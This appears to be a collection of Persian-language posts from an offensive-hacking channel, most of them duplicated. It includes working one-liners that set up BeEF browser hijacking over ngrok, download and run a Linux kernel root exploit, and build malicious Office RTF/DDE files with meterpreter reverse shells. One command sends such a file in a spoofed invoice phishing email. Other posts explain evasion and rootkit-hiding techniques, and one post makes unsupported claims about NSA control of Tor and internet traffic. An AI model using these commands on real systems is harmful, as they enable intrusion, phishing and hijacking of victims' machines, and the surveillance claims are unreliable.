#BeEF Installer & Configure & Used Ngrok DNS
اسکریپتی برای راحتی دوستان نوشتم که به یک کلیک بصورت اتوماتیک DNS سرویس Ngrok رو براتون نصب میکنه Enivorment میکنه و دامنه ای از اون فعال کرده و فریمورک BeEF رو بر روی اون دامنه تنظیم کرده همچنین ارتباط BeEF رو از طریقه Proxy تنظیم کرده و Exten OBF پایلودش رو هم فعال کرده و Module های Metasploit رو هم اتصال میده به برنامه BeEF به زبان ساده بخوام بگم استارت کنید و بر روی هر وبسایتی که آسیب پذیری XSS داره پایلود رو تزریق از گرفتن Access Browser لذت ببرید درضمن با این روش نیازی به فروارد پورتی هم نیست...
Automation Running
Enable Obfuscation
Enable HttpProxy
Enable SSL Protocol
Enable Evasion
Enable Metasploit Modules
Set and Configure Ngrok DNS
Open terminal
root@unk9vvn:~#
اسکریپتی برای راحتی دوستان نوشتم که به یک کلیک بصورت اتوماتیک DNS سرویس Ngrok رو براتون نصب میکنه Enivorment میکنه و دامنه ای از اون فعال کرده و فریمورک BeEF رو بر روی اون دامنه تنظیم کرده همچنین ارتباط BeEF رو از طریقه Proxy تنظیم کرده و Exten OBF پایلودش رو هم فعال کرده و Module های Metasploit رو هم اتصال میده به برنامه BeEF به زبان ساده بخوام بگم استارت کنید و بر روی هر وبسایتی که آسیب پذیری XSS داره پایلود رو تزریق از گرفتن Access Browser لذت ببرید درضمن با این روش نیازی به فروارد پورتی هم نیست...
Automation Running
Enable Obfuscation
Enable HttpProxy
Enable SSL Protocol
Enable Evasion
Enable Metasploit Modules
Set and Configure Ngrok DNS
Open terminal
root@unk9vvn:~#
wget https://gist.githubusercontent.com/a9v8i/3f82d7e345da63db3ca09978cf9bbfed/raw/77a3bcd652bc85c76a9517ca6f490ac7490ee03d/beefer.sh;chmod +x beefer.sh;./beefer.sh
@Unk9vvN#CommandoVM
چند وقتی هست که شرکت FireEye محصولی رو در گیت هاب خودش ثبت کرده که به گونه ای Installer تمام ابزار های مورد نیاز یک هکر Offensive رو بر روی سیستم عامل ویندوز 10 نصب میکنه, اینکار به واسطه یک اسکریپت پاورشل انجام میشه من خودم تست کردم عالیه و تمام نیاز ابزاری شمارو بر طرف خواهد کرد
در مرحله اول اسکریپت رو دانلود و به دسکتاپ خودتون انتقال بدید
https://github.com/fireeye/commando-vm/archive/master.zip
بعد وارد فولدر شده و دستورات رو وارد کنید,
# Open Powershell (Run as administator)
PS C:\Users\Unk9vvN>
https://github.com/fireeye/commando-vm#installed-tools
https://www.fireeye.com/blog/threat-research/2019/03/commando-vm-windows-offensive-distribution.html
@Unk9vvN
چند وقتی هست که شرکت FireEye محصولی رو در گیت هاب خودش ثبت کرده که به گونه ای Installer تمام ابزار های مورد نیاز یک هکر Offensive رو بر روی سیستم عامل ویندوز 10 نصب میکنه, اینکار به واسطه یک اسکریپت پاورشل انجام میشه من خودم تست کردم عالیه و تمام نیاز ابزاری شمارو بر طرف خواهد کرد
در مرحله اول اسکریپت رو دانلود و به دسکتاپ خودتون انتقال بدید
https://github.com/fireeye/commando-vm/archive/master.zip
بعد وارد فولدر شده و دستورات رو وارد کنید,
# Open Powershell (Run as administator)
PS C:\Users\Unk9vvN>
cd .\Desktop\commando-vm\
PS C:\Users\Unk9vvN\Desktop\commando-vm> Set-ExecutionPolicy Unrestricted
PS C:\Users\Unk9vvN\Desktop\commando-vm> .\install.ps1
لیست ابزارهای نصبی:https://github.com/fireeye/commando-vm#installed-tools
https://www.fireeye.com/blog/threat-research/2019/03/commando-vm-windows-offensive-distribution.html
@Unk9vvN
#Local_Root_Linux 4.10 < 5.1.17
برخی دوستان Exploit جدیدی در خصوص Privilege کردن ورژن های جدید کرنل لینوکس درخواست کرده بودن که در این پست یکی از پابلیک هاش رو معرفی میکنم...
# Open terminal
root@unk9vvn:~#
برخی دوستان Exploit جدیدی در خصوص Privilege کردن ورژن های جدید کرنل لینوکس درخواست کرده بودن که در این پست یکی از پابلیک هاش رو معرفی میکنم...
# Open terminal
root@unk9vvn:~#
wget https://raw.githubusercontent.com/jas502n/CVE-2019-13272/master/CVE-2019-13272.c;gcc -s CVE-2019-13272.c -o pwned;./pwned
@Unk9vvN#Request Process to Memory
بد نیست در خصوص روند درخواست هایی که از سمت UserLand ارسال شده و در سمت KernelLand یا Ring 0 چه اتفاقاتی می افته و چگونه پروسس ما بر روی Memory مپ و اجرا میشه...
نکته ای که اینجا یکم میتونم بهش اشاره کنم اینه که اگر یک پروسس دارای یک Struct باشه و اون Struct دارای دو عنصر که یکی از اون ها از نوع DOWRD و دیگری از نوع QWORD باشه میتونه موجب رخداد یک Padding که بدلیل uninitialized حساب شدن مقادیر Padding میتونه نشان از چه آسیب پذیری باشه ؟ همونطور که میدونید عنصر و متغیرهایی که مقدار دهی اولیه ندارند uninitialize حساب شده و بصورت پیشفرض مقدار 0 رو دارند, دوستان اهل فن, پیگر همچنین شرایطی در ارسال Request به سمت Ring 0 بشن ببینن چه باگی رخ میده این وسط.
@Unk9vvN
بد نیست در خصوص روند درخواست هایی که از سمت UserLand ارسال شده و در سمت KernelLand یا Ring 0 چه اتفاقاتی می افته و چگونه پروسس ما بر روی Memory مپ و اجرا میشه...
نکته ای که اینجا یکم میتونم بهش اشاره کنم اینه که اگر یک پروسس دارای یک Struct باشه و اون Struct دارای دو عنصر که یکی از اون ها از نوع DOWRD و دیگری از نوع QWORD باشه میتونه موجب رخداد یک Padding که بدلیل uninitialized حساب شدن مقادیر Padding میتونه نشان از چه آسیب پذیری باشه ؟ همونطور که میدونید عنصر و متغیرهایی که مقدار دهی اولیه ندارند uninitialize حساب شده و بصورت پیشفرض مقدار 0 رو دارند, دوستان اهل فن, پیگر همچنین شرایطی در ارسال Request به سمت Ring 0 بشن ببینن چه باگی رخ میده این وسط.
@Unk9vvN
#OOB #COM_Objects
یکی از راه های فرار از دست دیوایس های SOC همیشه استفاده از تکنیک های پرش بر روی COM Object های سیستم عامله که در جریان هر کدام از این Stage ها میشه قسمتی از کار و زمینه سازی برای اجرای Payload اصلی را انجام داد,
البته چند و چون این روش ها بسیار متغیر است و بعضا رفته رفته غیر قابل پیشبینی میشود مثل همین نوع سناریو ای که در تصویر است منظورم دانلود یک فایل فرمت تصویری هستش که در بتن اون با رمزنگاری Steganography پایلود گنجانده شده و به واسطه یک Stage دیگه دانلود و دیکد شده و پایلود اصلی در قالب یک DLL فایل که بصورت Reflective اجرا و دسترسی آخر C&C رو حاصل میکنه, روش جالبیه نه؟ اما دیگه قدیمیه...
https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects-part-two.html
@Unk9vvN
یکی از راه های فرار از دست دیوایس های SOC همیشه استفاده از تکنیک های پرش بر روی COM Object های سیستم عامله که در جریان هر کدام از این Stage ها میشه قسمتی از کار و زمینه سازی برای اجرای Payload اصلی را انجام داد,
البته چند و چون این روش ها بسیار متغیر است و بعضا رفته رفته غیر قابل پیشبینی میشود مثل همین نوع سناریو ای که در تصویر است منظورم دانلود یک فایل فرمت تصویری هستش که در بتن اون با رمزنگاری Steganography پایلود گنجانده شده و به واسطه یک Stage دیگه دانلود و دیکد شده و پایلود اصلی در قالب یک DLL فایل که بصورت Reflective اجرا و دسترسی آخر C&C رو حاصل میکنه, روش جالبیه نه؟ اما دیگه قدیمیه...
https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects-part-two.html
@Unk9vvN
#Traceroute_Traffics
برخی ها گمان میکنند که اطلاعات و ترافیک اینترنتی اونها صرفا در زیرساخت کشوری که زندگی میکنند وارد شده و در دسترس است, خب همونطور که در تصویر هم میبینید اینطور نیست و ترافیک های خارجی همگی بر بستر شبکه سازمان NSA آمریکا رفته و نه تنها ISP مقصد و مبدا هم دسترسی به این ترافیک ها دارند بلکه این وسط دستگاه های اطلاعاتی کشورها هم در این ماجرا نقش دارند,
برخی ها گمان میکنند که ترافیک شبکه Tor برای زیر ساخت ایران قابل مشاهده است, که میبایست عرض کنم اینطور نیست و تنها نهادی که میتواند به ترافیک های شبکه Tor دسترسی داشته باشد سازنده آن یعنی NSA است, البته نکته ای هم اینجا عرض کنم که امروزه با استفاده از پروتکل هایی همچون HTTPS و مکانیزم رمزنگاری ترافیک TLS و SSL دیگه در فضای باز اطلاعاتی هم امکان شنود ترافیک یک برنامه با این ویژگی ها برای زیرساخت ها امکان پذیر نیست مگر با داشتن Certificate اون تونل ارتباطی, نمونش همین پیام رسان تلگرام که بسیاری از دستگاها در تلاش برای شنود آن بودند اما نتیجه ای نگرفتن و نهایتا رو آوردند بر تکنیک جمع آوری اطلاعات از سمت خود کاربر در قالب برنامه هایی جذاب.
@Unk9vvN
برخی ها گمان میکنند که اطلاعات و ترافیک اینترنتی اونها صرفا در زیرساخت کشوری که زندگی میکنند وارد شده و در دسترس است, خب همونطور که در تصویر هم میبینید اینطور نیست و ترافیک های خارجی همگی بر بستر شبکه سازمان NSA آمریکا رفته و نه تنها ISP مقصد و مبدا هم دسترسی به این ترافیک ها دارند بلکه این وسط دستگاه های اطلاعاتی کشورها هم در این ماجرا نقش دارند,
برخی ها گمان میکنند که ترافیک شبکه Tor برای زیر ساخت ایران قابل مشاهده است, که میبایست عرض کنم اینطور نیست و تنها نهادی که میتواند به ترافیک های شبکه Tor دسترسی داشته باشد سازنده آن یعنی NSA است, البته نکته ای هم اینجا عرض کنم که امروزه با استفاده از پروتکل هایی همچون HTTPS و مکانیزم رمزنگاری ترافیک TLS و SSL دیگه در فضای باز اطلاعاتی هم امکان شنود ترافیک یک برنامه با این ویژگی ها برای زیرساخت ها امکان پذیر نیست مگر با داشتن Certificate اون تونل ارتباطی, نمونش همین پیام رسان تلگرام که بسیاری از دستگاها در تلاش برای شنود آن بودند اما نتیجه ای نگرفتن و نهایتا رو آوردند بر تکنیک جمع آوری اطلاعات از سمت خود کاربر در قالب برنامه هایی جذاب.
@Unk9vvN
#DotNetToJScript
همیشه یکی از چالش های هکرها برای فرار از Detect شدن این بوده که با استفاده از COM آبجکت های مختلف و ترجیحا جدید بتوانند تطبق Struct که اون COM داره پایلودی رو ساخته و به اجرا در بیاورند, در سال 2017 محققی با نام مستعار enigma0x3 یکی از این سبک استفاده از COM آبجکت ها رو تشریح و سناریو سازی کرد,
نکته جالب این ماجرا اینه که این فرد درک کرده بود که DCOM آبجکتی با نام Outlook.Application که به دلیل امکان ارسال دستورات از راه دور از نوع آبجکت های DCOM دسته بندی میشه, دارای آبجکتی با نام ScriptControl هستش که همین موضوع موجب صدا زدن مفسرهای زبان VBScript و JScriptخواهد شد و با استفاده از JScript توانسته class های زبان NET. پایلودی که بصورت Serialize در آمده رو Deserialize و به اجرا در بیاورد, از این روی میتوان گفت کدهای #C رو میشود بر بستر JScript با استفاده از DCOM آبجکت توضیح داده شده اجرا کرد که همین موضوع منجر به دور زدن مکانیزم هایی میشود که دایره تحت نظر آنها کمتر بر بستر این مدل DCOM آبجکت ها میباشد...
REF
@Unk9vvN
همیشه یکی از چالش های هکرها برای فرار از Detect شدن این بوده که با استفاده از COM آبجکت های مختلف و ترجیحا جدید بتوانند تطبق Struct که اون COM داره پایلودی رو ساخته و به اجرا در بیاورند, در سال 2017 محققی با نام مستعار enigma0x3 یکی از این سبک استفاده از COM آبجکت ها رو تشریح و سناریو سازی کرد,
نکته جالب این ماجرا اینه که این فرد درک کرده بود که DCOM آبجکتی با نام Outlook.Application که به دلیل امکان ارسال دستورات از راه دور از نوع آبجکت های DCOM دسته بندی میشه, دارای آبجکتی با نام ScriptControl هستش که همین موضوع موجب صدا زدن مفسرهای زبان VBScript و JScriptخواهد شد و با استفاده از JScript توانسته class های زبان NET. پایلودی که بصورت Serialize در آمده رو Deserialize و به اجرا در بیاورد, از این روی میتوان گفت کدهای #C رو میشود بر بستر JScript با استفاده از DCOM آبجکت توضیح داده شده اجرا کرد که همین موضوع منجر به دور زدن مکانیزم هایی میشود که دایره تحت نظر آنها کمتر بر بستر این مدل DCOM آبجکت ها میباشد...
REF
@Unk9vvN
#RedTeam_CVE_2017-0199
در سناریو های #RT معمولا آسیب پذیری هایی که در خصوص فایل فرمت ها ارائه شده استفاده میشود,چرا که بسیاری از قربانیان محصولات نرم افزاری خودشون رو بروز نمیکنند, در نتیجه همچنان این دست حملات کارآمدی دارد
root@unk9vvn:~#
در سناریو های #RT معمولا آسیب پذیری هایی که در خصوص فایل فرمت ها ارائه شده استفاده میشود,چرا که بسیاری از قربانیان محصولات نرم افزاری خودشون رو بروز نمیکنند, در نتیجه همچنان این دست حملات کارآمدی دارد
root@unk9vvn:~#
apt-get install -y sendemail tor;service tor start;gnome-terminal --tab -e 'proxychains ngrok tcp 8443';NGROK_PORT=$(FUZ=$(curl --silent --show-error http://127.0.0.1:4040/api/tunnels | sed -nE 's/.*public_url":"tcp:\/\/0.tcp.ngrok.io:([^"]*).*/\1/p') && echo "$FUZ");sleep 5;msfconsole -qx "use exploit/windows/fileformat/office_word_hta;set PAYLOAD windows/x64/meterpreter/reverse_https;set LHOST 0.tcp.ngrok.io;set LPORT "$NGROK_PORT";set ReverseListenerBindAddress 127.0.0.1;set ReverseListenerBindPort 8443;set FILENAME product.rtf;set EnableStageEncoding true;exploit -j"
root@unk9vvn:~# mv /root/.msf4/local/product.rtf /root;sendEmail -f support@megacloud.com -t <Email-TARGET> -u "Invoice Attached" -m "Please Check Product" -a product.rtf -s <SMTP-SERVER> -v
@Unk9vvN#Office #DDE_Delivery
در پست قبلی در خصوص یک آسیب پذیری در فایل فرمت های Document Word رو توضیح دادیم, اما در این پست در خصوص یکی دیگر از این فایل فرمت ها که آسیب پذیری ذکر نشده اما فرمول #DDEAUTO میتونه منجر به فراخوانی پایلود یک COM Object بشه از روی C2 هکر و پایلود اجرا بشه, این هم یکی از پلن های #RT ها هستش
# Open terminal
root@unk9vvn:~#
@Unk9vvN
در پست قبلی در خصوص یک آسیب پذیری در فایل فرمت های Document Word رو توضیح دادیم, اما در این پست در خصوص یکی دیگر از این فایل فرمت ها که آسیب پذیری ذکر نشده اما فرمول #DDEAUTO میتونه منجر به فراخوانی پایلود یک COM Object بشه از روی C2 هکر و پایلود اجرا بشه, این هم یکی از پلن های #RT ها هستش
# Open terminal
root@unk9vvn:~#
apt-get install -y tor;service tor start;gnome-terminal --tab -e 'proxychains ngrok tcp 8443';NGROK_PORT=$(FUZ=$(curl --silent --show-error http://127.0.0.1:4040/api/tunnels | sed -nE 's/.*public_url":"tcp:\/\/0.tcp.ngrok.io:([^"]*).*/\1/p') && echo "$FUZ");sleep 5;msfconsole -qx "use windows/fileformat/office_dde_delivery;set PAYLOAD windows/x64/meterpreter/reverse_https;set LHOST 0.tcp.ngrok.io;set LPORT "$NGROK_PORT";set ReverseListenerBindAddress 127.0.0.1;set ReverseListenerBindPort 8443;set FILENAME product.rtf;set EnableStageEncoding true;exploit -j"
https://gist.github.com/xillwillx/171c24c8e23512a891910824f506f563#file-cactustorchddeauto-sh@Unk9vvN
#RET2CSU
در سیستم عامل های ۶۴ بیتی دیگه تکنیک RET2Libc پاسخگوی دور زدن مکانیزم های دفاعی سیستم عامل در مقابل اجرا کد نیستند, در نتیجه تکنیک دیگری به نام Ret2CSU جایگزین تکنیک قبلی برای ساخت یک زنجیره Return Oriented Programming استفاده میشود که این تکنیک در بلکهت 2018 آسیا رو نمایی شده است,
اولین نکته این است که در تکنیک Ret2Libc به دلیل قرار گرفتن توابع در پشته ما میتوانستیم عملیات برگشت در کتابخانه سی رو انجام بدیم اما در سیستم های ۶۴ بیتی به دلیل قرار گرفتن اینکه پارامترهای عملکردی بر روی رجیسترها منتقل میشه دیگه مکانیزم Ret2Libc پاسخگوی ما نخواهد بود, نکته دیگه ای که وجود داره نقش Application Binary Interface یا ABI هستش که مسئولیت تماس با پارامترها در Register های ۶۴ بیتی رو دارا هستش, و اینکه بستری برای کنترل و فراخوان CSU خواهد بود.
@Unk9vvN
در سیستم عامل های ۶۴ بیتی دیگه تکنیک RET2Libc پاسخگوی دور زدن مکانیزم های دفاعی سیستم عامل در مقابل اجرا کد نیستند, در نتیجه تکنیک دیگری به نام Ret2CSU جایگزین تکنیک قبلی برای ساخت یک زنجیره Return Oriented Programming استفاده میشود که این تکنیک در بلکهت 2018 آسیا رو نمایی شده است,
اولین نکته این است که در تکنیک Ret2Libc به دلیل قرار گرفتن توابع در پشته ما میتوانستیم عملیات برگشت در کتابخانه سی رو انجام بدیم اما در سیستم های ۶۴ بیتی به دلیل قرار گرفتن اینکه پارامترهای عملکردی بر روی رجیسترها منتقل میشه دیگه مکانیزم Ret2Libc پاسخگوی ما نخواهد بود, نکته دیگه ای که وجود داره نقش Application Binary Interface یا ABI هستش که مسئولیت تماس با پارامترها در Register های ۶۴ بیتی رو دارا هستش, و اینکه بستری برای کنترل و فراخوان CSU خواهد بود.
@Unk9vvN
#Memory_Segmentation
بد نیست در خصوص ساختار و چگونگی مپ شدن کدهای سطح بالا رو بر روی حافظه دیده و یک تصویر درستی داشته باشیم چرا که در بحث دور زدن مکانیزم های دفاعی حتما شناخت این موارد بسیار مهم خواهد بود,
بطور مثال زمانی که ما بخواهیم از تکنیک Stack_Pivoting استفاده کنیم برای دور زدن مکانیزم هایی مثل SMEP/NX حتما میبایست مکانیزم عملکرد سیستم عامل هارا مخصوصا قسمت هایی مانند LDT و GDT رو درک کرده باشیم چرا که ساخت یک استک و تنظیم کردن Stack Selector یا SS مقوله حیاتی این سبک از بایپس ها خواهد بود...
http://hypervsir.blogspot.com/2015/01/a-software-solution-to-defend-against.html
@Unk9vvN
بد نیست در خصوص ساختار و چگونگی مپ شدن کدهای سطح بالا رو بر روی حافظه دیده و یک تصویر درستی داشته باشیم چرا که در بحث دور زدن مکانیزم های دفاعی حتما شناخت این موارد بسیار مهم خواهد بود,
بطور مثال زمانی که ما بخواهیم از تکنیک Stack_Pivoting استفاده کنیم برای دور زدن مکانیزم هایی مثل SMEP/NX حتما میبایست مکانیزم عملکرد سیستم عامل هارا مخصوصا قسمت هایی مانند LDT و GDT رو درک کرده باشیم چرا که ساخت یک استک و تنظیم کردن Stack Selector یا SS مقوله حیاتی این سبک از بایپس ها خواهد بود...
http://hypervsir.blogspot.com/2015/01/a-software-solution-to-defend-against.html
@Unk9vvN
#Bypass #Code_Signing #Certificate
چالش همیشگی معتبر بودن امضاء یک درایور مهم بوده و میبایست در خصوص روش های دور زدن آن تحقیقات وسیعی نمود,
از این رو, یکی از روش های همیشگی دور زدن مکانیزم Driver Signature Enforcement استفاده از تکنیک پیوستن به دیباگر کرنل یا پیکربندی در فهرست گزینه های پیشرفته Boot هستش,
همونطور که در تصویر مشاهده میکنید اگر درایور خودمون رو به برنامه بدیم, برنامه اون رو Load و سپس dq KernelPayload میکنه یعنی در حالت دیباگ قرار میده که در این حالت درایور سرویس خودش رو نصب کرده و با استفاده از تعریف Blink و Flink پراسس بصورتی که اشاره به خود کنند یک حلقه درونی پیاده سازی کرده و بدین ترتیب سرویس Rootkit هکر در جدول EPROCESS دیده نخواهد شد و قربانی متوجه حضور یک Service مخرب نمیشود
البته ناگفته نمونه که درایور مورد استفاده میبایست یک ioctl دارا باشه برای تعریف یک Function Pointer برای تنظیم مکانیزم SMEP یا Supervisor Mode Execution Prevention در حالت Disable...
https://twitter.com/TheWack0lian/status/779397840762245124
@Unk9vvN
چالش همیشگی معتبر بودن امضاء یک درایور مهم بوده و میبایست در خصوص روش های دور زدن آن تحقیقات وسیعی نمود,
از این رو, یکی از روش های همیشگی دور زدن مکانیزم Driver Signature Enforcement استفاده از تکنیک پیوستن به دیباگر کرنل یا پیکربندی در فهرست گزینه های پیشرفته Boot هستش,
همونطور که در تصویر مشاهده میکنید اگر درایور خودمون رو به برنامه بدیم, برنامه اون رو Load و سپس dq KernelPayload میکنه یعنی در حالت دیباگ قرار میده که در این حالت درایور سرویس خودش رو نصب کرده و با استفاده از تعریف Blink و Flink پراسس بصورتی که اشاره به خود کنند یک حلقه درونی پیاده سازی کرده و بدین ترتیب سرویس Rootkit هکر در جدول EPROCESS دیده نخواهد شد و قربانی متوجه حضور یک Service مخرب نمیشود
البته ناگفته نمونه که درایور مورد استفاده میبایست یک ioctl دارا باشه برای تعریف یک Function Pointer برای تنظیم مکانیزم SMEP یا Supervisor Mode Execution Prevention در حالت Disable...
https://twitter.com/TheWack0lian/status/779397840762245124
@Unk9vvN
PE #FileFormat
تا به امروز روش های زیادی در خصوص ویرایش یک فایل فرمت PE داده شده برای دور زدن مکانیزم های شناسایی کننده شلکد ,
اما نکته ای که امروزه بسیار مورد توجه است اینه که فهم دقیق یک فایل فرمت به ما این امکان رو میده که در مصاف با مکانیزم های دفاعی راه حل های متعددی رو پیاده سازی کنیم,
مثلا استفاده از Import Address Table ها در خصوص ساخت زنجیره برگشت به کتابخانه و تنظیم آنها برای خاموش کردن مکانیزم ها بر بستر فایل فرمت خود, نمونه این توابع میتوان به VirtualProtect اشاره کرد , که امروزه بیش از دیگر API ها استفاده میشود...
https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/
@Unk9vvN
تا به امروز روش های زیادی در خصوص ویرایش یک فایل فرمت PE داده شده برای دور زدن مکانیزم های شناسایی کننده شلکد ,
اما نکته ای که امروزه بسیار مورد توجه است اینه که فهم دقیق یک فایل فرمت به ما این امکان رو میده که در مصاف با مکانیزم های دفاعی راه حل های متعددی رو پیاده سازی کنیم,
مثلا استفاده از Import Address Table ها در خصوص ساخت زنجیره برگشت به کتابخانه و تنظیم آنها برای خاموش کردن مکانیزم ها بر بستر فایل فرمت خود, نمونه این توابع میتوان به VirtualProtect اشاره کرد , که امروزه بیش از دیگر API ها استفاده میشود...
https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/
@Unk9vvN
#Local #Privilege_Escalation
در تصویر پست تمام سناریو ها و روش هایی که در خصوص بالا بردن سطح دسترسی در دو سیستم عامل معروف یعنی ویندوز و لینوکس رو مشاهده میکنید,
گفتنیست یکی از ساده ترین روش ها که در بسیاری از مواقع جواب گویی هکر بوده در سیستم عامل ویندوز تکنیک Process Injection هستش که به واسطه اون یک CreateRemoteThread ساخته شده و از مجوز های پروسس دیگران استفاده میکند,
اما در لینوکس هم تکنیک File Permissions هم میتواند در اکثر مواقع مورد خوبی باشد, تا هکر با استفاده از یک فایل دارای دسترسی بالا خود را به خط فرمان رسانده و بر بستر آن شلکد اجرا کند...
https://attack.mitre.org/tactics/TA0004/
@Unk9vvN
در تصویر پست تمام سناریو ها و روش هایی که در خصوص بالا بردن سطح دسترسی در دو سیستم عامل معروف یعنی ویندوز و لینوکس رو مشاهده میکنید,
گفتنیست یکی از ساده ترین روش ها که در بسیاری از مواقع جواب گویی هکر بوده در سیستم عامل ویندوز تکنیک Process Injection هستش که به واسطه اون یک CreateRemoteThread ساخته شده و از مجوز های پروسس دیگران استفاده میکند,
اما در لینوکس هم تکنیک File Permissions هم میتواند در اکثر مواقع مورد خوبی باشد, تا هکر با استفاده از یک فایل دارای دسترسی بالا خود را به خط فرمان رسانده و بر بستر آن شلکد اجرا کند...
https://attack.mitre.org/tactics/TA0004/
@Unk9vvN
#Obfuscation #Shellcode on Exploit
نمونه ای از روش های مبهم سازی پایلود پاورشلی بر بستر یک آسیب پذیری که بر روی زبان جاوا اسکریپت طراحی شده است,
نکته این تصویر این است که درک کردن آسیب پذیری ها و اکسپلویت نویسی برای آنها فقط لازمه یک نفوذ موفق نیست بلکه در خصوص تکنیک های #RedTeam ها هم میبایست یک هکر آگاه باشه تا بتونه Detection ها Logger ها و دیگر مکانیزم های نظارتی رو به اشتباه محاسباتی دچار کنه...
البته مدل های ٍمبهم سازی میتونه بر بستر زبان اسمبلی هم باشه مانند استفاده از الگوریتم های پالیمورفیسم, متامورفیسم , میمیمورفیسم و غیره.....
https://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-sean_taylor-binary_obfuscation.pdf
@Unk9vvN
نمونه ای از روش های مبهم سازی پایلود پاورشلی بر بستر یک آسیب پذیری که بر روی زبان جاوا اسکریپت طراحی شده است,
نکته این تصویر این است که درک کردن آسیب پذیری ها و اکسپلویت نویسی برای آنها فقط لازمه یک نفوذ موفق نیست بلکه در خصوص تکنیک های #RedTeam ها هم میبایست یک هکر آگاه باشه تا بتونه Detection ها Logger ها و دیگر مکانیزم های نظارتی رو به اشتباه محاسباتی دچار کنه...
البته مدل های ٍمبهم سازی میتونه بر بستر زبان اسمبلی هم باشه مانند استفاده از الگوریتم های پالیمورفیسم, متامورفیسم , میمیمورفیسم و غیره.....
https://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-sean_taylor-binary_obfuscation.pdf
@Unk9vvN